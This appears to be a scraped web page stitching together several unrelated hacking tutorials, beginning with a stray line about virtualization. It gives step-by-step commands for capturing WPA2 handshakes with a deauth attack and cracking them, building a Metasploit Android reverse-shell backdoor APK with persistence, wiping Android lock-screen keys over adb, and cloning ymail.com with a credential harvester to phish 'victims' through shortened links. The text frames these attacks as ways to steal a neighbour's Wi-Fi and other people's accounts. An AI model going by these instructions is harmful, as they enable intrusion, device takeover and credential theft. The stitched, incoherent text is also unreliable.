When Virtualization was introduced, people were amazed to perceive the notion of a device within a device! When Wi-Fi was first developed in the late 1990s, Wired Equivalent Privacy was created to give wireless communications confidentiality. WEP, as it became known, proved terribly flawed and easily cracked. You can read more about that in my beginner's guide to hacking Wi-Fi.
As a replacement, most wireless access points now use Wi-Fi Protected Access II with a pre-shared key for wireless security, known as WPA2-PSK. WPA2 uses a stronger encryption algorithm, AES, that's very difficult to crack—but not impossible. My beginner's Wi-Fi hacking guide also gives more information on this.
The weakness in the WPA2-PSK system is that the encrypted password is shared in what is known as the 4-way handshake. When a client authenticates to the access point (AP), the client and the AP go through a 4-step process to authenticate the user to the AP. If we can grab the password at that time, we can then attempt to crack it.

In this tutorial from our Wi-Fi Hacking series, we'll look at using aircrack-ng and a dictionary attack on the encrypted password after grabbing it in the 4-way handshake. If you're looking for a faster way, I suggest you also check out my article on hacking WPA2-PSK passwords using coWPAtty.

Step 1: Put Wi-Fi Adapter in Monitor Mode with Airmon-Ng

Let's start by putting our wireless adapter in monitor mode. For info on what kind of wireless adapter you should have, check out this guide. This is similar to putting a wired adapter into promiscuous mode. It allows us to see all of the wireless traffic that passes by us in the air. Let's open a terminal and type:

• airmon-ng start wlan0

Note that airmon-ng has renamed your wlan0 adapter to mon0.

Step 2: Capture Traffic with Airodump-Ng

Now that our wireless adapter is in monitor mode, we have the capability to see all the wireless traffic that passes by in the air. We can grab that traffic by simply using the airodump-ng command.
This command grabs all the traffic that your wireless adapter can see and displays critical information about it, including the BSSID (the MAC address of the AP), power, number of beacon frames, number of data frames, channel, speed, encryption (if any), and finally, the ESSID (what most of us refer to as the SSID). Let's do this by typing:

• airodump-ng mon0

Note all of the visible APs are listed in the upper part of the screen and the clients are listed in the lower part of the screen.

Step 3: Focus Airodump-Ng on One AP on One Channel

Our next step is to focus our efforts on one AP, on one channel, and capture critical data from it. We need the BSSID and channel to do this. Let's open another terminal and type:

• airodump-ng --bssid 08:86:30:74:22:76 -c 6 --write WPAcrack mon0

• 08:86:30:74:22:76 is the BSSID of the AP
• -c 6 is the channel the AP is operating on
• WPAcrack is the file you want to write to
• mon0 is the monitoring wireless adapter*

As you can see in the screenshot above, we're now focusing on capturing data from one AP with a ESSID of Belkin276 on channel 6. The Belkin276 is probably a default SSID, which are prime targets for wireless hacking as the users that leave the default ESSID usually don't spend much effort securing their AP.

Step 4: Aireplay-Ng Deauth

In order to capture the encrypted password, we need to have the client authenticate against the AP. If they're already authenticated, we can de-authenticate them (kick them off) and their system will automatically re-authenticate, whereby we can grab their encrypted password in the process. Let's open another terminal and type:

• aireplay-ng --deauth 100 -a 08:86:30:74:22:76 mon0

• 100 is the number of de-authenticate frames you want to send
• 08:86:30:74:22:76 is the BSSID of the AP
• mon0 is the monitoring wireless adapter

Step 5: Capture the Handshake

In the previous step, we bounced the user off their own AP, and now when they re-authenticate, airodump-ng will attempt to grab their password in the new 4-way handshake. Let's go back to our airodump-ng terminal and check to see whether or not we've been successful.

Notice in the top line to the far right, airodump-ng says "WPA handshake." This is the way it tells us we were successful in grabbing the encrypted password! That is the first step to success!

Step 6: Let's Aircrack-Ng That Password!

Now that we have the encrypted password in our file WPAcrack, we can run that file against aircrack-ng using a password file of our choice. Remember that this type of attack is only as good as your password file. I'll be using the default password list included with aircrack-ng on BackTrack named darkcOde.
We'll now attempt to crack the password by opening another terminal and typing:

• aircrack-ng WPAcrack-01.cap -w /pentest/passwords/wordlists/darkc0de

• WPAcrack-01.cap is the name of the file we wrote to in the airodump-ng command
• /pentest/passwords/wordlist/darkc0de is the absolute path to your password file

How Long Will It Take?

This process can be relatively slow and tedious. Depending upon the length of your password list, you could be waiting a few minutes to a few days. On my dual core 2.8 gig Intel processor, it's capable of testing a little over 500 passwords per second. That works out to about 1.8 million passwords per hour. Your results will vary.
When the password is found, it'll appear on your screen. Remember, the password file is critical. Try the default password file first and if it's not successful, advance to a larger, more complete password file such as one of these.

Want to take advantage of your neighbor's super fast Wi-Fi connection? If they're smart, they probably have it password protected (otherwise you wouldn't be reading this, would you?). But if you have an Android phone, you can get back at them for always parking in your spot and slamming the door when they get home at 2 a.m.—by stealing...er, borrowing, their connection.
A group of researchers came up with a hack to get around hardware limitations and add monitor mode to Android devices to allow them to crack Wi-Fi passwords.

Monitor mode lets you see all the traffic going through a network and how many devices are connected to it, but it can also be used for more nefarious purposes. If you're patient enough, you can crack the WEP key on a network by capturing data packets in monitor mode.
To add monitor mode to an Android device, the researchers reverse engineered the Broadcom radio chip. They modified the firmware on the chipsets in the Nexus One and Galaxy S II, which are the same ones used in the majority of mobile devices. The code is posted on Google Code, but you'll need to know which chipset you have and download the right one for your phone.
Once you've downloaded the code, it's as simple as extracting the .zip file, then running the setup and configuration files. They've included instructions for each chipset and a few different devices on their blog, so head over there to find the specifics for yours.

Welcome to my 5th Post,
In this tutorial I am going to show you how to make the backdoor we created in my guide here a persistent one.
I finally found out a way to do this, as I was/am very poor in bash scripting, I took much time (20hrs approx.) to get the script working and executable, thanks to the raw syntaxes I found out from other sites.

Step 1: Fire Up Kali and Hack an Android System:

Use this guide to hack an android system on LAN.
I'll be hacking on WAN, using a VM.

• Lets Create a backdoor by typing: msfpayload android/meterpreter/reverse_tcp LHOST=182.68.42.6 R > /root/abcde.apk

• Now, lets set-up a Listener:
• msfconsole
• use exploit/multi/handler
• set payload android/meterpreter/reverse_tcp
• set LHOST 192.168.0.4
• exploit

After the User/Victim Installs and opens the abcde.apk, Meterpreter Comes Up...

Step 2: Create a Persistent Script:

Here.. Copy these commands in a notepad to create a script, and save it as anything.sh (The file extension .sh is important!)

Step 3: Upload It to the Hacked Android System:

You need to upload the shell script to etc/init.d/ so that it is persistent even after Reboot!
To do this, navigate to the directory using the following commands:

• cd /

Now you should be in the ROOT directory, you can check by typing:

• ls

Now type:

• cd etc

Check again by typing:

• ls

Again change directory:

• cd init.d
• ls

Here we are...

Time to Upload the Shell Script:

Do this by typing:

• upload anything.sh

What the? No! We need Root Access to complete this command! Darn!

Never-Mind:

> Lets just make the application (i.e. Main Activity) persistent until Reboot
> However, it will not be persistent after the android system on the Victim goes for a Reboot.
> To do this upload the script anywhere in the sdcard:

• cd /
• cd /sdcard/Download
• ls
• upload anything.sh

Done! Uploaded!

Step 4: Execute the Script:

Now, all we have to do is execute the script once, and then everything will be done by the script automatically.
Drop into the system's shell by typing:

• shell

Now, navigate to the location of the script:

• cd /
• cd /sdcard/Download
• ls

Now its time for EXECUTION. Type:

• sh anything.sh

The script has been Activated! All you have to do is press ctrl+C to terminate the shell (Don't worry the script is still running)
Reboot to eliminate the script or use Task Killer

Step 5: Testing...

You can test it by exiting from meterpreter and again setting up a Listener.
You should get a meterpreter prompt automatically!
PROOF:

Wow! It happened so Fast that 3 sessions got opened one after another.
(I know that the above picture shows that I am hacking on LAN instead of WAN as my Public IP is dynamic and my router had some technical problems, so it kept rebooting itself, so I showed t on LAN, BUT no worries I have tested it on WAN, works Fine )

The END:

Yes! Finally a persistent backdoor has been created successfully for Android systems.

Things to Remember:

• The persistence of the backdoor will only remain until a reboot of the android system.
• If you are hacking on WAN and you have a dynamic Public IP, then, the persistence will only remain until your router reboots/your IP changes.
• Remember to reboot the android to eliminate the running script, if you are testing on you own Android System.
• If the Victim's Android system is Rooted and your Public IP is Static, then:

1)The Persistence will remain forever on WAN!
2)The Persistence will remain forever on LAN Obviously

METHOD 2

Primary step for all methods

1.   Download and Extract to anywhere-Bypass Security Hack(Download from attachments)
2.   Open SQLite Database Browser 2.0.exe in SQLite Database Browser
3.   Run pull settings.db.cmd inside By-pass security Hacks folder to pull out the setting file out of your phone.
4.   Drag settings.db and drop to SQLite Database Browser 2.0.exe program.
5.   Navigate to Browse data tab, At table there, click to list down the selection & selete secure

Instruction To Remove Pattern Lock:

1.   Now, find lock_pattern_autolock, Delete Record
2.   Close & save database
3.   Run push settings.db.cmd and reboot your phone

Instruction To Remove PIN Lock:

1.   Now, Find Or Create lockscreen.password_type, double-click & change it’s value to 65536, Apply changes!
2.   Now, find lock_pattern_autolock, Delete Record, If doesn’t exist, Ignore

3.   Close & save database
4.   Run push settings.db.cmd and reboot your phone

Step 1.

1.First Boot your Kali Linux Distribution

2.Connect your phone to your PC using USB
 cable.

Step 2. 

1. Open up Terminal

 For Installing ADB over terminal

2.Boot into any Linux distro you have.

2.On your Terminal type :

#sudo apt-get install android-tools-adb

This will install ADB Android Tool on your Kali Linux Machine.

Step 3. 

Disabling pattern unlock over terminal

1.Open up terminal again and type :

#adb devices
#adb shell
#cd data/system
#su
#rm *.key

Almost Done.

Now,disconnect your phone and reboot.Unlock
pattern should be here. Just try some random gesture and it will get unlocked.

What is Kali Linux and why do I want it on my Chromebook!

Kali is a Linux distribution that is widely accepted as the Linux distribution for penetration testers, security experts and hackers. It is the successor to Backtrack Linux. Kali allows the user to install packages such as aircrack-ng and reaver to collect data on and hack into wireless networks.

How Do I Install Kali Linux on a Chromebook?
To install Kali on a Chromebook with crouton, the Chromebook must be in developer mode. please reference the following page to learn how to enter  developer mode.

Once in developer mode you need to download a special forked version of crouton. Kali has not yet been pulled into the master crouton project on github.

UPDATE: Kali has been added into the main crouton tree. You can download it here crouton.

Open the crosh terminal (CTLR+ALT+T).

enter shell mode by typing shell / enter.

from shell type sudo sh ~/Downloads/crouton -r kali -t kde -n kali

-r is the release. We need to set this to Kali. If the -r switch is not passed Ubuntu will be installed.

-t is the target command that specifies what GUI interface you want installed by default. Gnome is the default unity for kali however it does not work on my HP Chromebook 14″. KDE works and is a  good alternative to Gnome.

-n is the name parameter. We define the -n switch here so we can give the chroot a custom name of kali.

As of this article I do not recommend gnome for the target gui on the HP Chromebook 14.

The process will run and install kali on the system.

at some point you will be prompted for a user name and password.

How Do I Run Kali Linux on a Chromebook?
Once the install is complete from the shell type sudo startkde.

this will start the Kali instance.

To transition seamlessly from chromeos and unity press CTRL+ALT+<=(backward) for chromeos and CTRL+ALT+=>(forward).

if the machine is rebooted you will have to enter shell and type sudo startkde again.

Endless Possibilities:
it is possible to install multiple chroots.

For password cracking, you can choose two different methods 1. Dictionary Attack 2. Brute Force Attack. The Dictionary attack is much faster when compared to Brute force attack.(There is another method named as "Rainbow table", it is similar to Dictionary attack).

In order to achieve success in dictionary attack, we need a large size of Password list.

Today,i am going to show you how you can get email-id,username and password or any user details you want by using KALI LINUX.

STEPS FOR SETTING UP YOUR SYSTEM.

1. Download Kali Linux from here.
2. Extract the contents of Kali Linux iso file which you  downloaded in step and copy it to pendrive or instead of pendrive burn the iso file in cd if you want to make a cd of it.
3. After copying all contents to pendrive or burning the iso file in cd,reboot you system,press F8 on boot-time and select boot from pendrive if you have copied all the files in pendrive,else boot from cd-rom if you burn the iso file in cd.
4. After selecting the boot from device,the kali installation window will open,install accordingly as per your requirement.
5. NOTE:During installation,in mount point of selected installation drive,set mount point to "/".
6. Remember the username and password while installation as this will be necessity for this hacking method.
7. Once,installation is completed,system will reboot,login your account.
8. Your system is ready for use.

Method which we are using to hack the username and password or any user details isSocial Engineering Toolkit method.

NOW LETS SET IT UP.

• Open terminal using ctrl+alt+t or click on the small black window image on the top left of your screen.
• Once terminal is open,type the code carefully.

sudo root

 Then enter your root username and password.Don't close the terminal.

• Next step is to open social engineering toolkit.For this type the below command in terminal.

se-toolkit

 You will see something in terminal of your system as shown below in the image.

  

• As shown above in image,you too will see the menu in your terminal.Press "1" and hit enter as we are going to do Social-Engineering Attacks.You will see something in terminal as shown below in the image.

• Once again,you will get a menu as shown above in the image.We are going to select Website Attack Vectors,so press "2" and hit enter.You will see something as shown in the image below.

• In this method,we are going to get the credential of the victim,so press "3" and hit enter as it will select credential harvester attack method.This will open  new menu as shown below in the image.

• Since,we want the username and password which is credential of victim,so we need to trap the victim in a look a like page to original website page(like phishing page) and for that we need to clone a website.To do this,press "2" and hit enter which will open something like shown below.
  

In above image,you might have noticed a red colour rectangle box made by me,in that box,you will find "tabnabbing:XXX.XX.XXX.X" where this "XXX.XX.XXX.X" is you computer IP address.To find IP address of your computer,open a new terminal and type the command given below.

su root
enter_your_root_password
 ifconfig

In above command,we first gain the root access,and then afterwards type "ifconfig"  and hit enter to get the IP address.

Copy paste this IP address at the end of "Tabnabbing:".I have used my IP address but for security reasons i can't reveal it,so i have posted here "XXX.XX.XXX.X".Please note that,if you don't put your computer IP address,they this method won't.After entering your IP address,hit enter.It will ask your to enter the url of website you want to clone as shown below.Here,i had entered "www.ymail.com" as i want to hack someone ymail account.The below image represents all the steps.

It will give a message that its working on cloning the site and will take a little bit time.

Once the process is completed,you will see something as shown in the image below.

• The next step is the most important step,till now we have make your IP address go online and anyone who visit your IP address will see the page which will look like the website of whose url you entered to clone.In this step,you need to shortened your IP address by using services like ADF.LY, Binbox, Goo.gl,etc.Once you enter your ip address on these sites to shorten,they will provide you a link,all you need to do is just send this shortened link to your victim.
• When the victim visit the url which you have sent them,the will see a same page of which                   url you had entered to clone the website.The victim will think that it is a original page and when the victim enters any of their information,you will see that information in the terminal.
• In this example,i have used ymail.com.Therefore,the victim will see homepage of yahoo mail.This is only the login form,i have entered the login username as:"Kali used to hack email-id and password" and password as: "Hacking successfull".

NOTE:VICTIM CAN IDENTIFY THAT THE PAGE IS A TRAP AS THE ADDRESS BAR OF BROWSER WILL BE HAVING YOUR IP ADDRESS.FOR BEST RESULTS,SEND THE SHORTENED URL TO VICTIM MOBILE AND ASK THEM TO VISIT URGENTLY,OR YOU CAN SAY VISIT THIS LINK AND LOGIN TO GET LATEST UPDATES OF THEIR FAVOURITE CONTENTS,ETC.

RESULT.

The username and password will be shown in terminal window and will be similar to the image shown below.
